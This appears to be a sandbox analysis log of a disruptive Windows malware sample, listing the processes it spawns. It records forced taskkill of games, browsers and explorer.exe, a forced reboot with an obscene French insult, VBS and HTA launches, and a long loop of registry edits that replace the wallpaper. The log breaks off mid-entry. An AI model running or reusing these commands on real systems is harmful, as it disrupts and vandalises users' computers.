    taskkill /F /IM RobloxPlayerBeta.exe
    3⤵
    - Kills process with taskkill
    PID:3892
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM FortniteClient-Win64-Shipping.exe
    3⤵
    - Kills process with taskkill
    PID:4688
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM GenshinImpact.exe
    3⤵
    - Kills process with taskkill
    PID:3152
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM Among Us.exe
    3⤵
    - Kills process with taskkill
    PID:1628
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM chrome.exe
    3⤵
    - Kills process with taskkill
    PID:4888
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM firefox.exe
    3⤵
    - Kills process with taskkill
    PID:3568
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM msedge.exe
    3⤵
    - Kills process with taskkill
    PID:2660
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM iexplore.exe
    3⤵
    - Kills process with taskkill
    PID:4364
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM explorer.exe
    3⤵
    - Kills process with taskkill
    PID:1104
- - C:\Windows\system32\shutdown.exe
    shutdown -r -t 60 -c "Dans 1 minutes tu n'as plus de PC fils de viol, On t'a bien baiser le cul fils de pute :)"
    3⤵
    PID:1844
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6396.vbs"
    3⤵
    PID:4824
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5084.vbs"
    3⤵
    PID:1996
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\23881.vbs"
    3⤵
    PID:4604
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\risitas.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    3⤵
    PID:5008
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\29423.vbs" 27880.bat
    3⤵
    PID:2820
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\27880.bat" "
      4⤵
      PID:4896
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:2524
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:4072
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:3552
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:3048
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:4660
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9287.vbs"
        5⤵
        
        PID:4360
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:2652
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:4524
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:4688
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:1392
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:2564
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9287.vbs"
        5⤵
        
        PID:3856
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:3356
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:3004
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:1284
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:4332
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:4356
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9287.vbs"
        5⤵
        
        PID:3832
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:4184
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:448
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:3668
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:2484
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:3820
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9287.vbs"
        5⤵
        
        PID:3848
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:3912
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:680
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:3628
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:4176
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:3076
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9287.vbs"
        5⤵
        
        PID:5012
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:4208
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:3988
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:3980
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:4308
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:1844
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9287.vbs"
        5⤵
        
        PID:3016
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:5076
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:2264
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:3876
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:4792
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:4584
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9287.vbs"
        5⤵
        
        PID:3500
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:756
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:3232
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:4460
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:3708
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:1612
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9287.vbs"
        5⤵
        
        PID:4672
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:3664
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:3164
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:1732
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:4296
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:744
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9287.vbs"
        5⤵
        
        PID:4124
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:4660
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:1040
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:2056
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:4820
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:3152
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9287.vbs"
        5⤵
        
        PID:3976
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:860
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:3892
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:668
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:5056
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:3384
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9287.vbs"
        5⤵
        
        PID:4204
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:3388
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:3380
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:3816
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:3768
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:3912
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9287.vbs"
        5⤵
        
        PID:4180
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:2228
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:3076
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:4208
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:372
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:3980
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9287.vbs"
        5⤵
        
        PID:4308
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:3220
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:3420
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:4912
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:3984
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:452
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9287.vbs"
        5⤵
        
        PID:3336
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:4496
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:3216
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:3708
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:4996
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:736
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9287.vbs"
        5⤵
        
        PID:3164
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:4276
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:744
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:4660
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:1040
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:2056
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9287.vbs"
        5⤵
        
        PID:4412
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:3152
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:2660
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:4572
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:3452
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:3384
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9287.vbs"
        5⤵
        
        PID:3676
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:2484
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:3540
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:3912
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:2228
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:1672
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9287.vbs"
        5⤵
        
        PID:3712
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:3396
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:2504
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:3868
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:2700
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:1844
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9287.vbs"
        5⤵
        
        PID:2836
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:4448
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:1640
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:3232
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:3216
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:3708
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9287.vbs"
        5⤵
        
        PID:3664
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:3048
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:4524
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:3772
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:5072
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:2056
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9287.vbs"
        5⤵
        
        PID:3004
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:4572
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:3388
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:3836
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:8
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:4800
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9287.vbs"
        5⤵
        
        PID:3608
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:1848
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:4692
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:2316
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:3060
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:1980
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9287.vbs"
        5⤵
        
        PID:3876
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:2820
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:4872
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:3084
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:2316
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:1980
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9287.vbs"
        5⤵
        
        PID:5976
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:6088
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:6100
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:6112
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:6128
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:1980
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9287.vbs"
        5⤵
        
        PID:3720
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:4996
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:5240
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:5556
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:5604
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:5580
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9287.vbs"
        5⤵
        
        PID:5536
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:5664
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:5624
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:5412
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:5684
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:5788
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9287.vbs"
        5⤵
        
        PID:5772
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:5808
    - - C:\Windows\system32\reg.exe
        
